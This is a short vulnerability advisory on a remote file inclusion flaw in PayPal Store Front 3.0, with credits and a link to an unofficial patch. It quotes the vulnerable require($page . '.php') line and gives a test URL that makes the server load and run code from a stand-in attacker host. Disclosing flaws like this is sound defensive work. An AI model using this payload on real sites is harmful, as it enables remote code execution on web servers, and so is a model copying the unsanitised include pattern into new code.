|
|
| |
PayPal Store Front "is created for small to medium size companies who want to sell products online, but is not limited to it. Any one, who has something to sell, can use this Cart System to sell".
A vulnerability in the product allows remote attackers to include arbitrary PHP files (that are then executed) that can be stored either locally on the server, or remotely. |
| |
Credit:
The original advisory can be downloaded from: http://www.zone-h.org/en/advisories/read/id=3231/.
The information has been provided by Astharot.
|
| |
Vulnerable systems:
* PayPal Store Front version 3.0
There is a file inclusion vulnerability in the index.php file:
require ($page . ".php");
Is it possible for a remote attacker to include an external file and execute arbitrary commands with the privileges of the web server (nobody by default).
To test the vulnerability you can try the following URL:
http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index
This URL will cause the file "http://www.attacker.com/index.php" to be included and executed by the server.
Solution:
A unofficial patch is available for download (for the free version of PayPal Store Front) from here: http://www.zone-h.org/download/file=4957.
Vendor status:
The author has been contacted.
|
|
|
|
|
